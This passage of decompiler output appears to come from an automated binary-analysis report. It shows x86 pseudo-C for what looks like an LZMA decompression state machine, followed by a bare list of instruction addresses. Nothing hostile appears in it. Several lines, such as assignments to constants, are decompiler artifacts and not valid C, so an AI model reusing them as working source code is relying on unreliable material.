												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406409
0x00406409
0x0040640d
0x0040641a
0x00406424
0x00000000
0x0040640f
0x0040640f
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
